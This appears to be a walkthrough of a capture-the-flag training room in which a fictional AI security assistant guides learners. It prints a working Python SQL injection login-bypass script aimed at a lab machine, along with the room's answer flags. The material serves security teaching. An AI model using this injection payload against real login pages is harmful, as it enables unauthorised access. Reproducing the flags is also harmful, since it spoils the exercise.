The lights glimmer and servers hum blissfully at The Best Festival Company (TBFC) saint, melting the snow surrounding the data centre. TBFC has continued its pursuit of AI excellence. After the past two years, they realise that Van Chatty, their in-house chatbot, wasn’t quite meeting their standards.
Unfortunately for the elves at TBFC, they are also not immune to performance metrics. The elves aim to find ways of increasing their velocity; something to manage the tedious, distracting tasks, which allows the elves to do the real magic.
TBFC, adventurous as ever, is trialling their brand new cyber security AI assistant, Van SolveIT, which is capable of helping the elves with all their defensive, offensive, and software needs. They decide to put this flashy technology to use as Christmas approaches, to identify, confirm, and resolve any potential vulnerabilities, before any nay-sayers can.
// 01 Learning Objectives
- How AI can be used as an assistant in cyber security for a variety of roles, domains and tasks
- Using an AI assistant to solve various tasks within cyber security
- Some of the considerations, particularly in cyber security, surrounding the use of AI
// 02 Task 2 AI for Cyber Security Showcase (sAInt)
Complete the AI showcase by progressing through all of the stages. What is the flag presented to you?
Van SolveIt Problem
Complete Stage to continue
Stage: 2
- Write Yes
- Open a terminal or visual editor like Sublime.
- Use nano script.py to create the file.
- Paste your SQL injection script (e.g., alice’ OR 1=1 — – into the file).
- Save the file with Ctrl + O and exit using Ctrl + X.
- Run the script via python3 script.py to execute the vulnerability.
import requests
# Set up the login credentials
username = "alice' OR 1=1 -- -"
password = "test"
# URL to the vulnerable login page
url = "http://MACHINE_IP:5000/login.php"
# Set up the payload (the input)
payload = {
"username": username,
"password": password
}
# Send a POST request to the login page with our payload
response = requests.post(url, data=payload)
# Print the response content
print("Response Status Code:", response.status_code)
print("\nResponse Headers:")
for header, value in response.headers.items():
print(f" {header}: {value}")
print("\nResponse Body:")
print(response.text)complete the task and move to next task you just need to entract with the ai chatbot and after the stage 4 interaction you will get the flag saint
Flag: THM{AI_MANIA}
Execute the exploit provided by the red team agent against the vulnerable web application hosted at 10.48.178.173:5000. What flag is provided in the script’s output after it?
Remember, you will need to update the IP address placeholder in the script with the IP of your vulnerable machine (10.48.178.173:5000)
python3 script.py
Flag: THM{SQLI_EXPLOIT}
If you enjoyed today’s room saint, feel free to check out the Defending Adverserial Attacks room, where you will learn how to harden and secure AI models.
No Answer Needed
For any query contact us at contact@cipherssecurity.com